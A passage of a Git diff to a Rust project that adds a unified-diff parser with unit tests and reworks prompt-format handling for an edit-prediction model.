Deletion(&'a str), + Addition(&'a str), + NoNewlineAtEOF, + Garbage(&'a str), +} + +#[derive(Debug, PartialEq)] +pub struct HunkLocation { + pub start_line_old: u32, + pub count_old: u32, + pub start_line_new: u32, + pub count_new: u32, +} + +impl<'a> DiffLine<'a> { + pub fn parse(line: &'a str) -> Self { + Self::try_parse(line).unwrap_or(Self::Garbage(line)) + } + + fn try_parse(line: &'a str) -> Option { + if line.starts_with("\\ No newline") { + return Some(Self::NoNewlineAtEOF); + } + if let Some(header) = line.strip_prefix("---").and_then(eat_required_whitespace) { + let path = parse_header_path("a/", header); + Some(Self::OldPath { path }) + } else if let Some(header) = line.strip_prefix("+++").and_then(eat_required_whitespace) { + Some(Self::NewPath { + path: parse_header_path("b/", header), + }) + } else if let Some(header) = line.strip_prefix("@@").and_then(eat_required_whitespace) { + if header.starts_with("...") { + return Some(Self::HunkHeader(None)); + } + + let mut tokens = header.split_whitespace(); + let old_range = tokens.next()?.strip_prefix('-')?; + let new_range = tokens.next()?.strip_prefix('+')?; + + let (start_line_old, count_old) = old_range.split_once(',').unwrap_or((old_range, "1")); + let (start_line_new, count_new) = new_range.split_once(',').unwrap_or((new_range, "1")); + + Some(Self::HunkHeader(Some(HunkLocation { + start_line_old: start_line_old.parse::().ok()?.saturating_sub(1), + count_old: count_old.parse().ok()?, + start_line_new: start_line_new.parse::().ok()?.saturating_sub(1), + count_new: count_new.parse().ok()?, + }))) + } else if let Some(deleted_header) = line.strip_prefix("-") { + Some(Self::Deletion(deleted_header)) + } else if line.is_empty() { + Some(Self::Context("")) + } else if let Some(context) = line.strip_prefix(" ") { + Some(Self::Context(context)) + } else { + Some(Self::Addition(line.strip_prefix("+")?)) + } + } +} + +impl<'a> Display for DiffLine<'a> { + fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result { + match self { + DiffLine::OldPath { path } => write!(f, "--- {path}"), + DiffLine::NewPath { path } => write!(f, "+++ {path}"), + DiffLine::HunkHeader(Some(hunk_location)) => { + write!( + f, + "@@ -{},{} +{},{} @@", + hunk_location.start_line_old + 1, + hunk_location.count_old, + hunk_location.start_line_new + 1, + hunk_location.count_new + ) + } + DiffLine::HunkHeader(None) => write!(f, "@@ ... @@"), + DiffLine::Context(content) => write!(f, " {content}"), + DiffLine::Deletion(content) => write!(f, "-{content}"), + DiffLine::Addition(content) => write!(f, "+{content}"), + DiffLine::NoNewlineAtEOF => write!(f, "\\ No newline at end of file"), + DiffLine::Garbage(line) => write!(f, "{line}"), + } + } +} + +fn parse_header_path<'a>(strip_prefix: &'static str, header: &'a str) -> Cow<'a, str> { + if !header.contains(['"', '\\']) { + let path = header.split_ascii_whitespace().next().unwrap_or(header); + return Cow::Borrowed(path.strip_prefix(strip_prefix).unwrap_or(path)); + } + + let mut path = String::with_capacity(header.len()); + let mut in_quote = false; + let mut chars = header.chars().peekable(); + let mut strip_prefix = Some(strip_prefix); + + while let Some(char) = chars.next() { + if char == '"' { + in_quote = !in_quote; + } else if char == '\\' { + let Some(&next_char) = chars.peek() else { + break; + }; + chars.next(); + path.push(next_char); + } else if char.is_ascii_whitespace() && !in_quote { + break; + } else { + path.push(char); + } + + if let Some(prefix) = strip_prefix + && path == prefix + { + strip_prefix.take(); + path.clear(); + } + } + + Cow::Owned(path) +} + +fn eat_required_whitespace(header: &str) -> Option<&str> { + let trimmed = header.trim_ascii_start(); + + if trimmed.len() == header.len() { + None + } else { + Some(trimmed) + } +} + +#[cfg(test)] +mod tests { + use super::*; + use indoc::indoc; + + #[test] + fn parse_lines_simple() { + let input = indoc! {" + diff --git a/text.txt b/text.txt + index 86c770d..a1fd855 100644 + --- a/file.txt + +++ b/file.txt + @@ -1,2 +1,3 @@ + context + -deleted + +inserted + garbage + + --- b/file.txt + +++ a/file.txt + "}; + + let lines = input.lines().map(DiffLine::parse).collect::>(); + + assert_eq!( + lines, + &[ + DiffLine::Garbage("diff --git a/text.txt b/text.txt"), + DiffLine::Garbage("index 86c770d..a1fd855 100644"), + DiffLine::OldPath { + path: "file.txt".into() + }, + DiffLine::NewPath { + path: "file.txt".into() + }, + DiffLine::HunkHeader(Some(HunkLocation { + start_line_old: 0, + count_old: 2, + start_line_new: 0, + count_new: 3 + })), + DiffLine::Context("context"), + DiffLine::Deletion("deleted"), + DiffLine::Addition("inserted"), + DiffLine::Garbage("garbage"), + DiffLine::Context(""), + DiffLine::OldPath { + path: "b/file.txt".into() + }, + DiffLine::NewPath { + path: "a/file.txt".into() + }, + ] + ); + } + + #[test] + fn file_header_extra_space() { + let options = ["--- file", "--- file", "---\tfile"]; + + for option in options { + assert_eq!( + DiffLine::parse(option), + DiffLine::OldPath { + path: "file".into() + }, + "{option}", + ); + } + } + + #[test] + fn hunk_header_extra_space() { + let options = [ + "@@ -1,2 +1,3 @@", + "@@ -1,2 +1,3 @@", + "@@\t-1,2\t+1,3\t@@", + "@@ -1,2 +1,3 @@", + "@@ -1,2 +1,3 @@", + "@@ -1,2 +1,3 @@", + "@@ -1,2 +1,3 @@ garbage", + ]; + + for option in options { + assert_eq!( + DiffLine::parse(option), + DiffLine::HunkHeader(Some(HunkLocation { + start_line_old: 0, + count_old: 2, + start_line_new: 0, + count_new: 3 + })), + "{option}", + ); + } + } + + #[test] + fn hunk_header_without_location() { + assert_eq!(DiffLine::parse("@@ ... @@"), DiffLine::HunkHeader(None)); + } + + #[test] + fn test_parse_path() { + assert_eq!(parse_header_path("a/", "foo.txt"), "foo.txt"); + assert_eq!( + parse_header_path("a/", "foo/bar/baz.txt"), + "foo/bar/baz.txt" + ); + assert_eq!(parse_header_path("a/", "a/foo.txt"), "foo.txt"); + assert_eq!( + parse_header_path("a/", "a/foo/bar/baz.txt"), + "foo/bar/baz.txt" + ); + + // Extra + assert_eq!( + parse_header_path("a/", "a/foo/bar/baz.txt 2025"), + "foo/bar/baz.txt" + ); + assert_eq!( + parse_header_path("a/", "a/foo/bar/baz.txt\t2025"), + "foo/bar/baz.txt" + ); + assert_eq!( + parse_header_path("a/", "a/foo/bar/baz.txt \""), + "foo/bar/baz.txt" + ); + + // Quoted + assert_eq!( + parse_header_path("a/", "a/foo/bar/\"baz quox.txt\""), + "foo/bar/baz quox.txt" + ); + assert_eq!( + parse_header_path("a/", "\"a/foo/bar/baz quox.txt\""), + "foo/bar/baz quox.txt" + ); + assert_eq!( + parse_header_path("a/", "\"foo/bar/baz quox.txt\""), + "foo/bar/baz quox.txt" + ); + assert_eq!(parse_header_path("a/", "\"whatever 🤷\""), "whatever 🤷"); + assert_eq!( + parse_header_path("a/", "\"foo/bar/baz quox.txt\" 2025"), + "foo/bar/baz quox.txt" + ); + // unescaped quotes are dropped + assert_eq!(parse_header_path("a/", "foo/\"bar\""), "foo/bar"); + + // Escaped + assert_eq!( + parse_header_path("a/", "\"foo/\\\"bar\\\"/baz.txt\""), + "foo/\"bar\"/baz.txt" + ); + assert_eq!( + parse_header_path("a/", "\"C:\\\\Projects\\\\My App\\\\old file.txt\""), + "C:\\Projects\\My App\\old file.txt" + ); + } + + #[test] + fn test_parse_diff_with_leading_and_trailing_garbage() { + let diff = indoc! {" + I need to make some changes. + + I'll change the following things: + - one + - two + - three + + ``` + --- a/file.txt + +++ b/file.txt + one + +AND + two + ``` + + Summary of what I did: + - one + - two + - three + + That's about it. + "}; + + let mut events = Vec::new(); + let mut parser = DiffParser::new(diff); + while let Some(event) = parser.next().unwrap() { + events.push(event); + } + + assert_eq!( + events, + &[ + DiffEvent::Hunk { + path: "file.txt".into(), + hunk: Hunk { + context: "one\ntwo\n".into(), + edits: vec![Edit { + range: 4..4, + text: "AND\n".into() + }], + start_line: None, + }, + status: FileStatus::Modified, + }, + DiffEvent::FileEnd { renamed_to: None } + ], + ) + } + + #[test] + fn test_no_newline_at_eof() { + let diff = indoc! {" + --- a/file.py + +++ b/file.py + @@ -55,7 +55,3 @@ class CustomDataset(Dataset): + torch.set_rng_state(state) + mask = self.transform(mask) + + - if self.mode == 'Training': + - return (img, mask, name) + - else: + - return (img, mask, name) + \\ No newline at end of file + "}; + + let mut events = Vec::new(); + let mut parser = DiffParser::new(diff); + while let Some(event) = parser.next().unwrap() { + events.push(event); + } + + assert_eq!( + events, + &[ + DiffEvent::Hunk { + path: "file.py".into(), + hunk: Hunk { + context: concat!( + " torch.set_rng_state(state)\n", + " mask = self.transform(mask)\n", + "\n", + " if self.mode == 'Training':\n", + " return (img, mask, name)\n", + " else:\n", + " return (img, mask, name)", + ) + .into(), + edits: vec![Edit { + range: 80..203, + text: "".into() + }], + start_line: Some(54), // @@ -55,7 -> line 54 (0-indexed) + }, + status: FileStatus::Modified, + }, + DiffEvent::FileEnd { renamed_to: None } + ], + ); + } + + #[test] + fn test_no_newline_at_eof_addition() { + let diff = indoc! {" + --- a/file.txt + +++ b/file.txt + @@ -1,2 +1,3 @@ + context + -deleted + +added line + \\ No newline at end of file + "}; + + let mut events = Vec::new(); + let mut parser = DiffParser::new(diff); + while let Some(event) = parser.next().unwrap() { + events.push(event); + } + + assert_eq!( + events, + &[ + DiffEvent::Hunk { + path: "file.txt".into(), + hunk: Hunk { + context: "context\ndeleted\n".into(), + edits: vec![Edit { + range: 8..16, + text: "added line".into() + }], + start_line: Some(0), // @@ -1,2 -> line 0 (0-indexed) + }, + status: FileStatus::Modified, + }, + DiffEvent::FileEnd { renamed_to: None } + ], + ); + } + + #[test] + fn test_double_no_newline_at_eof() { + // Two consecutive "no newline" markers - the second should be ignored + let diff = indoc! {" + --- a/file.txt + +++ b/file.txt + @@ -1,3 +1,3 @@ + line1 + -old + +new + line3 + \\ No newline at end of file + \\ No newline at end of file + "}; + + let mut events = Vec::new(); + let mut parser = DiffParser::new(diff); + while let Some(event) = parser.next().unwrap() { + events.push(event); + } + + assert_eq!( + events, + &[ + DiffEvent::Hunk { + path: "file.txt".into(), + hunk: Hunk { + context: "line1\nold\nline3".into(), // Only one newline removed + edits: vec![Edit { + range: 6..10, // "old\n" is 4 bytes + text: "new\n".into() + }], + start_line: Some(0), + }, + status: FileStatus::Modified, + }, + DiffEvent::FileEnd { renamed_to: None } + ], + ); + } + + #[test] + fn test_no_newline_after_context_not_addition() { + // "No newline" after context lines should remove newline from context, + // not from an earlier addition + let diff = indoc! {" + --- a/file.txt + +++ b/file.txt + @@ -1,4 +1,4 @@ + line1 + -old + +new + line3 + line4 + \\ No newline at end of file + "}; + + let mut events = Vec::new(); + let mut parser = DiffParser::new(diff); + while let Some(event) = parser.next().unwrap() { + events.push(event); + } + + assert_eq!( + events, + &[ + DiffEvent::Hunk { + path: "file.txt".into(), + hunk: Hunk { + // newline removed from line4 (context), not from "new" (addition) + context: "line1\nold\nline3\nline4".into(), + edits: vec![Edit { + range: 6..10, // "old\n" is 4 bytes + text: "new\n".into() // Still has newline + }], + start_line: Some(0), + }, + status: FileStatus::Modified, + }, + DiffEvent::FileEnd { renamed_to: None } + ], + ); + } + + #[test] + fn test_strip_diff_metadata() { + let diff_with_metadata = indoc! {r#" + diff --git a/file.txt b/file.txt + index 1234567..abcdefg 100644 + --- a/file.txt + +++ b/file.txt + @@ -1,3 +1,4 @@ + context line + -removed line + +added line + more context + "#}; + + let stripped = strip_diff_metadata(diff_with_metadata); + + assert_eq!( + stripped, + indoc! {r#" + --- a/file.txt + +++ b/file.txt + @@ -1,3 +1,4 @@ + context line + -removed line + +added line + more context + "#} + ); + } + + #[test] + fn test_apply_diff_to_string_no_trailing_newline() { + // Text without trailing newline; diff generated without + // `\ No newline at end of file` marker. + let text = "line1\nline2\nline3"; + let diff = indoc! {" + --- a/file.txt + +++ b/file.txt + @@ -1,3 +1,3 @@ + line1 + -line2 + +replaced + line3 + "}; + + let result = apply_diff_to_string(diff, text).unwrap(); + assert_eq!(result, "line1\nreplaced\nline3"); + } + + #[test] + fn test_apply_diff_to_string_trailing_newline_present() { + // When text has a trailing newline, exact matching still works and + // the fallback is never needed. + let text = "line1\nline2\nline3\n"; + let diff = indoc! {" + --- a/file.txt + +++ b/file.txt + @@ -1,3 +1,3 @@ + line1 + -line2 + +replaced + line3 + "}; + + let result = apply_diff_to_string(diff, text).unwrap(); + assert_eq!(result, "line1\nreplaced\nline3\n"); + } + + #[test] + fn test_apply_diff_to_string_deletion_at_end_no_trailing_newline() { + // Deletion of the last line when text has no trailing newline. + // The edit range must be clamped so it doesn't index past the + // end of the text. + let text = "line1\nline2\nline3"; + let diff = indoc! {" + --- a/file.txt + +++ b/file.txt + @@ -1,3 +1,2 @@ + line1 + line2 + -line3 + "}; + + let result = apply_diff_to_string(diff, text).unwrap(); + assert_eq!(result, "line1\nline2\n"); + } + + #[test] + fn test_apply_diff_to_string_replace_last_line_no_trailing_newline() { + // Replace the last line when text has no trailing newline. + let text = "aaa\nbbb\nccc"; + let diff = indoc! {" + --- a/file.txt + +++ b/file.txt + @@ -1,3 +1,3 @@ + aaa + bbb + -ccc + +ddd + "}; + + let result = apply_diff_to_string(diff, text).unwrap(); + assert_eq!(result, "aaa\nbbb\nddd"); + } + + #[test] + fn test_apply_diff_to_string_multibyte_no_trailing_newline() { + // Multi-byte UTF-8 characters near the end; ensures char boundary + // safety when the fallback clamps edit ranges. + let text = "hello\n세계"; + let diff = indoc! {" + --- a/file.txt + +++ b/file.txt + @@ -1,2 +1,2 @@ + hello + -세계 + +world + "}; + + let result = apply_diff_to_string(diff, text).unwrap(); + assert_eq!(result, "hello\nworld"); + } + + #[test] + fn test_find_context_candidates_no_false_positive_mid_text() { + // The stripped fallback must only match at the end of text, not in + // the middle where a real newline exists. + let text = "aaa\nbbb\nccc\n"; + let mut hunk = Hunk { + context: "bbb\n".into(), + edits: vec![], + start_line: None, + }; + + let candidates = find_context_candidates(text, &mut hunk); + // Exact match at offset 4 — the fallback is not used. + assert_eq!(candidates, vec![4]); + } + + #[test] + fn test_find_context_candidates_fallback_at_end() { + let text = "aaa\nbbb"; + let mut hunk = Hunk { + context: "bbb\n".into(), + edits: vec![], + start_line: None, + }; + + let candidates = find_context_candidates(text, &mut hunk); + assert_eq!(candidates, vec![4]); + // Context should be stripped. + assert_eq!(hunk.context, "bbb"); + } + + #[test] + fn test_find_context_candidates_no_fallback_mid_text() { + // "bbb" appears mid-text followed by a newline, so the exact + // match succeeds. Verify the stripped fallback doesn't produce a + // second, spurious candidate. + let text = "aaa\nbbb\nccc"; + let mut hunk = Hunk { + context: "bbb\nccc\n".into(), + edits: vec![], + start_line: None, + }; + + let candidates = find_context_candidates(text, &mut hunk); + // No exact match (text ends without newline after "ccc"), but the + // stripped context "bbb\nccc" matches at offset 4, which is the end. + assert_eq!(candidates, vec![4]); + assert_eq!(hunk.context, "bbb\nccc"); + } + + #[test] + fn test_find_context_candidates_clamps_edit_ranges() { + let text = "aaa\nbbb"; + let mut hunk = Hunk { + context: "aaa\nbbb\n".into(), + edits: vec![Edit { + range: 4..8, // "bbb\n" — end points at the trailing \n + text: "ccc\n".into(), + }], + start_line: None, + }; + + let candidates = find_context_candidates(text, &mut hunk); + assert_eq!(candidates, vec![0]); + // Edit range end should be clamped to 7 (new context length). + assert_eq!(hunk.edits[0].range, 4..7); + } + + #[test] + fn test_unified_diff_with_context_matches_expected_context_window() { + let old_text = "line1\nline2\nline3\nline4\nline5\nCHANGE_ME\nline7\nline8\n"; + let new_text = "line1\nline2\nline3\nline4\nline5\nCHANGED\nline7\nline8\n"; + + let diff_default = unified_diff_with_context(old_text, new_text, 0, 0, 3); + assert_eq!( + diff_default, + "@@ -3,6 +3,6 @@\n line3\n line4\n line5\n-CHANGE_ME\n+CHANGED\n line7\n line8\n" + ); + + let diff_full_context = unified_diff_with_context(old_text, new_text, 0, 0, 8); + assert_eq!( + diff_full_context, + "@@ -1,8 +1,8 @@\n line1\n line2\n line3\n line4\n line5\n-CHANGE_ME\n+CHANGED\n line7\n line8\n" + ); + + let diff_no_context = unified_diff_with_context(old_text, new_text, 0, 0, 0); + assert_eq!(diff_no_context, "@@ -6,1 +6,1 @@\n-CHANGE_ME\n+CHANGED\n"); + } +} diff --git a/crates/zeta_prompt/src/zeta_prompt.rs b/crates/zeta_prompt/src/zeta_prompt.rs index bdd5afffa975adc11176928a89e4cb52b4cd69c3..49b86404a8ad49c27e29bb2b887fb3fc8171c35c 100644 --- a/crates/zeta_prompt/src/zeta_prompt.rs +++ b/crates/zeta_prompt/src/zeta_prompt.rs @@ -1,4 +1,8 @@ -use anyhow::Result; +pub mod excerpt_ranges; +pub mod multi_region; +pub mod udiff; + +use anyhow::{Result, anyhow}; use serde::{Deserialize, Serialize}; use std::fmt::Write; use std::ops::Range; @@ -6,6 +10,10 @@ use std::path::Path; use std::sync::Arc; use strum::{EnumIter, IntoEnumIterator as _, IntoStaticStr}; +pub use crate::excerpt_ranges::{ + ExcerptRanges, compute_editable_and_context_ranges, compute_legacy_excerpt_ranges, +}; + pub const CURSOR_MARKER: &str = "<|user_cursor|>"; pub const MAX_PROMPT_TOKENS: usize = 4096; @@ -18,55 +26,40 @@ fn estimate_tokens(bytes: usize) -> usize { bytes / 3 } -/// The client's preferred edit prediction model. The server may override this. -#[derive(Clone, Copy, Debug, PartialEq, Eq, Hash, Serialize, Deserialize)] -pub enum EditPredictionModelKind { - Zeta1, - Zeta2, -} - -/// Pre-computed byte offset ranges within `cursor_excerpt` for different -/// editable and context token budgets. Allows the server to select the -/// appropriate ranges for whichever model it uses. -#[derive(Clone, Debug, PartialEq, Hash, Serialize, Deserialize)] -pub struct ExcerptRanges { - /// Editable region computed with a 150-token budget. - pub editable_150: Range, - /// Editable region computed with a 180-token budget. - pub editable_180: Range, - /// Editable region computed with a 350-token budget. - pub editable_350: Range, - /// Context boundary when using editable_150 with 350 tokens of additional context. - pub editable_150_context_350: Range, - /// Context boundary when using editable_180 with 350 tokens of additional context. - pub editable_180_context_350: Range, - /// Context boundary when using editable_350 with 150 tokens of additional context. - pub editable_350_context_150: Range, +/// Leave some slack to avoid overflow. +fn apply_prompt_budget_margin(max_tokens: usize) -> usize { + (max_tokens as f64 * 0.9).floor() as usize } #[derive(Clone, Debug, PartialEq, Hash, Serialize, Deserialize)] pub struct ZetaPromptInput { pub cursor_path: Arc, pub cursor_excerpt: Arc, - pub editable_range_in_excerpt: Range, pub cursor_offset_in_excerpt: usize, #[serde(default, skip_serializing_if = "Option::is_none")] pub excerpt_start_row: Option, pub events: Vec>, - pub related_files: Vec, - /// When set, the excerpt was computed with a larger budget (~512 tokens) - /// and these ranges let the server select model-appropriate subsets. - /// When absent, the excerpt IS the context region and - /// `editable_range_in_excerpt` is the only editable range. + #[serde(default)] + pub related_files: Option>, + #[serde(default, skip_serializing_if = "Vec::is_empty")] + pub active_buffer_diagnostics: Vec, + /// These ranges let the server select model-appropriate subsets. + pub excerpt_ranges: ExcerptRanges, + /// Byte offset ranges within `cursor_excerpt` for all syntax nodes that + /// contain `cursor_offset_in_excerpt`, ordered from innermost to outermost. + /// When present, the server uses these to compute editable/context ranges + /// instead of `excerpt_ranges`. #[serde(default, skip_serializing_if = "Option::is_none")] - pub excerpt_ranges: Option, - /// Client's preferred model. The server may override. + pub syntax_ranges: Option>>, + /// The name of the edit prediction model experiment to use. #[serde(default, skip_serializing_if = "Option::is_none")] - pub preferred_model: Option, + pub experiment: Option, #[serde(default)] pub in_open_source_repo: bool, #[serde(default)] pub can_collect_data: bool, + #[serde(default, skip_serializing_if = "Option::is_none")] + pub repo_url: Option, } #[derive( @@ -92,6 +85,17 @@ pub enum ZetaFormat { V0131GitMergeMarkersPrefix, V0211Prefill, V0211SeedCoder, + v0226Hashline, + V0304VariableEdit, + V0304SeedNoEdits, + /// Multi-block marker spans with NO_EDITS sentinel. + V0306SeedMultiRegions, + /// Byte-exact marker spans; all intermediate markers emitted; repeated marker means no-edit. + V0316SeedMultiRegions, + /// V0316 with larger block sizes. + V0318SeedMultiRegions, + /// V0316, but marker numbers are relative to the cursor block (e.g. -1, -0, +1). + V0317SeedMultiRegions, } impl std::fmt::Display for ZetaFormat { @@ -102,10 +106,19 @@ impl std::fmt::Display for ZetaFormat { impl ZetaFormat { pub fn parse(format_name: &str) -> Result { + let lower = format_name.to_lowercase(); + + // Exact case-insensitive match takes priority, bypassing ambiguity checks. + for variant in ZetaFormat::iter() { + if <&'static str>::from(&variant).to_lowercase() == lower { + return Ok(variant); + } + } + let mut results = ZetaFormat::iter().filter(|version| { <&'static str>::from(version) .to_lowercase() - .contains(&format_name.to_lowercase()) + .contains(&lower) }); let Some(result) = results.next() else { anyhow::bail!( @@ -128,25 +141,6 @@ impl ZetaFormat { .collect::>() .concat() } - - pub fn special_tokens(&self) -> &'static [&'static str] { - match self { - ZetaFormat::V0112MiddleAtEnd - | ZetaFormat::V0113Ordered - | ZetaFormat::V0114180EditableRegion => &[ - "<|fim_prefix|>", - "<|fim_suffix|>", - "<|fim_middle|>", - "<|file_sep|>", - CURSOR_MARKER, - ], - ZetaFormat::V0120GitMergeMarkers => v0120_git_merge_markers::special_tokens(), - ZetaFormat::V0131GitMergeMarkersPrefix | ZetaFormat::V0211Prefill => { - v0131_git_merge_markers_prefix::special_tokens() - } - ZetaFormat::V0211SeedCoder => seed_coder::special_tokens(), - } - } } #[derive(Clone, Debug, PartialEq, Hash, Serialize, Deserialize)] @@ -200,6 +194,15 @@ pub fn write_event(prompt: &mut String, event: &Event) { } } +#[derive(Clone, Debug, PartialEq, Hash, Serialize, Deserialize)] +pub struct ActiveBufferDiagnostic { + pub severity: Option, + pub message: String, + pub snippet: String, + pub snippet_buffer_row_range: Range, + pub diagnostic_range_in_snippet: Range, +} + #[derive(Clone, Debug, PartialEq, Hash, Serialize, Deserialize)] pub struct RelatedFile { pub path: Arc, @@ -218,33 +221,123 @@ pub struct RelatedExcerpt { } pub fn prompt_input_contains_special_tokens(input: &ZetaPromptInput, format: ZetaFormat) -> bool { - format - .special_tokens() - .iter() - .any(|token| input.cursor_excerpt.contains(token)) + special_tokens_for_format(format).iter().any(|token| { + if let Some(line_token) = token.strip_suffix('\n') { + input.cursor_excerpt.lines().any(|line| line == line_token) + } else { + input.cursor_excerpt.contains(token) + } + }) +} + +pub fn format_zeta_prompt(input: &ZetaPromptInput, format: ZetaFormat) -> Option { + format_prompt_with_budget_for_format(input, format, MAX_PROMPT_TOKENS) +} + +pub fn special_tokens_for_format(format: ZetaFormat) -> &'static [&'static str] { + match format { + ZetaFormat::V0112MiddleAtEnd => v0112_middle_at_end::special_tokens(), + ZetaFormat::V0113Ordered => v0113_ordered::special_tokens(), + ZetaFormat::V0114180EditableRegion => v0114180_editable_region::special_tokens(), + ZetaFormat::V0120GitMergeMarkers => v0120_git_merge_markers::special_tokens(), + ZetaFormat::V0131GitMergeMarkersPrefix => v0131_git_merge_markers_prefix::special_tokens(), + ZetaFormat::V0211Prefill => v0211_prefill::special_tokens(), + ZetaFormat::V0211SeedCoder => seed_coder::special_tokens(), + ZetaFormat::v0226Hashline => hashline::special_tokens(), + ZetaFormat::V0304VariableEdit => v0304_variable_edit::special_tokens(), + ZetaFormat::V0304SeedNoEdits => seed_coder::special_tokens(), + ZetaFormat::V0316SeedMultiRegions => { + static TOKENS: &[&str] = &[ + seed_coder::FIM_SUFFIX, + seed_coder::FIM_PREFIX, + seed_coder::FIM_MIDDLE, + seed_coder::FILE_MARKER, + multi_region::V0316_END_MARKER, + CURSOR_MARKER, + multi_region::MARKER_TAG_PREFIX, + ]; + TOKENS + } + ZetaFormat::V0318SeedMultiRegions => { + static TOKENS: &[&str] = &[ + seed_coder::FIM_SUFFIX, + seed_coder::FIM_PREFIX, + seed_coder::FIM_MIDDLE, + seed_coder::FILE_MARKER, + multi_region::V0318_END_MARKER, + CURSOR_MARKER, + multi_region::MARKER_TAG_PREFIX, + ]; + TOKENS + } + ZetaFormat::V0317SeedMultiRegions => { + static TOKENS: &[&str] = &[ + seed_coder::FIM_SUFFIX, + seed_coder::FIM_PREFIX, + seed_coder::FIM_MIDDLE, + seed_coder::FILE_MARKER, + multi_region::V0317_END_MARKER, + CURSOR_MARKER, + multi_region::RELATIVE_MARKER_TAG_PREFIX, + ]; + TOKENS + } + ZetaFormat::V0306SeedMultiRegions => { + static TOKENS: &[&str] = &[ + seed_coder::FIM_SUFFIX, + seed_coder::FIM_PREFIX, + seed_coder::FIM_MIDDLE, + seed_coder::FILE_MARKER, + seed_coder::START_MARKER, + seed_coder::SEPARATOR, + seed_coder::END_MARKER, + CURSOR_MARKER, + multi_region::MARKER_TAG_PREFIX, + ]; + TOKENS + } + } } -pub fn format_zeta_prompt(input: &ZetaPromptInput, format: ZetaFormat) -> String { - format_zeta_prompt_with_budget(input, format, MAX_PROMPT_TOKENS) +/// Returns the (editable_token_limit, context_token_limit) for a given format. +pub fn token_limits_for_format(format: ZetaFormat) -> (usize, usize) { + match format { + ZetaFormat::V0112MiddleAtEnd | ZetaFormat::V0113Ordered => (150, 350), + ZetaFormat::V0114180EditableRegion => (180, 350), + ZetaFormat::V0120GitMergeMarkers + | ZetaFormat::V0131GitMergeMarkersPrefix + | ZetaFormat::V0211Prefill + | ZetaFormat::V0211SeedCoder + | ZetaFormat::v0226Hashline + | ZetaFormat::V0306SeedMultiRegions + | ZetaFormat::V0316SeedMultiRegions + | ZetaFormat::V0318SeedMultiRegions + | ZetaFormat::V0317SeedMultiRegions + | ZetaFormat::V0304SeedNoEdits => (350, 150), + ZetaFormat::V0304VariableEdit => (1024, 0), + } } -/// Post-processes model output for the given zeta format by stripping format-specific suffixes. -pub fn clean_zeta2_model_output(output: &str, format: ZetaFormat) -> &str { +pub fn stop_tokens_for_format(format: ZetaFormat) -> &'static [&'static str] { match format { - ZetaFormat::V0120GitMergeMarkers => output - .strip_suffix(v0120_git_merge_markers::END_MARKER) - .unwrap_or(output), - ZetaFormat::V0131GitMergeMarkersPrefix => output - .strip_suffix(v0131_git_merge_markers_prefix::END_MARKER) - .unwrap_or(output), - ZetaFormat::V0211SeedCoder => output - .strip_suffix(seed_coder::END_MARKER) - .unwrap_or(output), - _ => output, + ZetaFormat::v0226Hashline => &[hashline::NO_EDITS_COMMAND_MARKER], + ZetaFormat::V0112MiddleAtEnd + | ZetaFormat::V0113Ordered + | ZetaFormat::V0114180EditableRegion + | ZetaFormat::V0120GitMergeMarkers + | ZetaFormat::V0131GitMergeMarkersPrefix + | ZetaFormat::V0211Prefill + | ZetaFormat::V0211SeedCoder + | ZetaFormat::V0304VariableEdit + | ZetaFormat::V0306SeedMultiRegions + | ZetaFormat::V0304SeedNoEdits => &[], + ZetaFormat::V0316SeedMultiRegions => &[multi_region::V0316_END_MARKER], + ZetaFormat::V0318SeedMultiRegions => &[multi_region::V0318_END_MARKER], + ZetaFormat::V0317SeedMultiRegions => &[multi_region::V0317_END_MARKER], } } -pub fn excerpt_range_for_format( +pub fn excerpt_ranges_for_format( format: ZetaFormat, ranges: &ExcerptRanges, ) -> (Range, Range) { @@ -253,195 +346,888 @@ pub fn excerpt_range_for_format( ranges.editable_150.clone(), ranges.editable_150_context_350.clone(), ), - ZetaFormat::V0114180EditableRegion - | ZetaFormat::V0120GitMergeMarkers + ZetaFormat::V0114180EditableRegion => ( + ranges.editable_180.clone(), + ranges.editable_180_context_350.clone(), + ), + ZetaFormat::V0120GitMergeMarkers | ZetaFormat::V0131GitMergeMarkersPrefix | ZetaFormat::V0211Prefill - | ZetaFormat::V0211SeedCoder => ( + | ZetaFormat::V0211SeedCoder + | ZetaFormat::v0226Hashline + | ZetaFormat::V0304SeedNoEdits + | ZetaFormat::V0306SeedMultiRegions + | ZetaFormat::V0316SeedMultiRegions + | ZetaFormat::V0318SeedMultiRegions + | ZetaFormat::V0317SeedMultiRegions => ( ranges.editable_350.clone(), ranges.editable_350_context_150.clone(), ), + ZetaFormat::V0304VariableEdit => { + let context = ranges + .editable_350_context_1024 + .clone() + .or(ranges.editable_350_context_512.clone()) + .unwrap_or_else(|| ranges.editable_350_context_150.clone()); + (context.clone(), context) + } } } -pub fn resolve_cursor_region( - input: &ZetaPromptInput, - format: ZetaFormat, -) -> (&str, Range, usize) { - let Some(ranges) = &input.excerpt_ranges else { - return ( - &input.cursor_excerpt, - input.editable_range_in_excerpt.clone(), - input.cursor_offset_in_excerpt, - ); - }; - - let (editable_range, context_range) = excerpt_range_for_format(format, ranges); - let context_start = context_range.start; - let context_text = &input.cursor_excerpt[context_range]; - let adjusted_editable = - (editable_range.start - context_start)..(editable_range.end - context_start); - let adjusted_cursor = input.cursor_offset_in_excerpt - context_start; - - (context_text, adjusted_editable, adjusted_cursor) -} - -fn format_zeta_prompt_with_budget( - input: &ZetaPromptInput, +pub fn write_cursor_excerpt_section_for_format( format: ZetaFormat, - max_tokens: usize, -) -> String { - let (context, editable_range, cursor_offset) = resolve_cursor_region(input, format); - let path = &*input.cursor_path; - - let mut cursor_section = String::new(); + prompt: &mut String, + path: &Path, + context: &str, + editable_range: &Range, + cursor_offset: usize, +) { match format { - ZetaFormat::V0112MiddleAtEnd => { - v0112_middle_at_end::write_cursor_excerpt_section( - &mut cursor_section, - path, - context, - &editable_range, - cursor_offset, - ); - } + ZetaFormat::V0112MiddleAtEnd => v0112_middle_at_end::write_cursor_excerpt_section( + prompt, + path, + context, + editable_range, + cursor_offset, + ), ZetaFormat::V0113Ordered | ZetaFormat::V0114180EditableRegion => { v0113_ordered::write_cursor_excerpt_section( - &mut cursor_section, + prompt, path, context, - &editable_range, + editable_range, cursor_offset, ) } ZetaFormat::V0120GitMergeMarkers => v0120_git_merge_markers::write_cursor_excerpt_section( - &mut cursor_section, + prompt, path, context, - &editable_range, + editable_range, cursor_offset, ), ZetaFormat::V0131GitMergeMarkersPrefix | ZetaFormat::V0211Prefill => { v0131_git_merge_markers_prefix::write_cursor_excerpt_section( + prompt, 